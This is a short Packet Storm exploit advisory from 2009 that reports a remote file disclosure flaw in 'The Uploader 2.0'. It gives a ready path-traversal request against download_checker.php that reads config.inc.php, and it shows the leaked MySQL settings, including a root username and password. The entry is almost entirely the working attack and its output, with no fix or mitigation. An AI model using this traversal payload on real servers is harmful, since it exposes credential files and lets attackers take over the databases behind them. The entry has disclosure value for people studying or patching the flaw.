The Uploader 2.0 File Disclosure

2009-12-22T00:00:00
ID PACKETSTORM:84184
Type packetstorm
Reporter Stack
Modified 2009-12-22T00:00:00

Description

                                        
                                            `# Title: The Uploader 2.0 Remote File disclosure Vulnerability  
# Author: Stack  
  
http://server/the_uploader/api/download_checker.php?filename=../config.inc.php  
  
next open the config.inc.php file and you got the MySQL configuration ( user & password ) :d  
  
//MySQL configuration and connection functions  
$main['host']="127.0.0.1";  
$main['user']="root";  
$main['pass']="jH445Ui";  
$main['dbnm']="jkL_database";  
  
`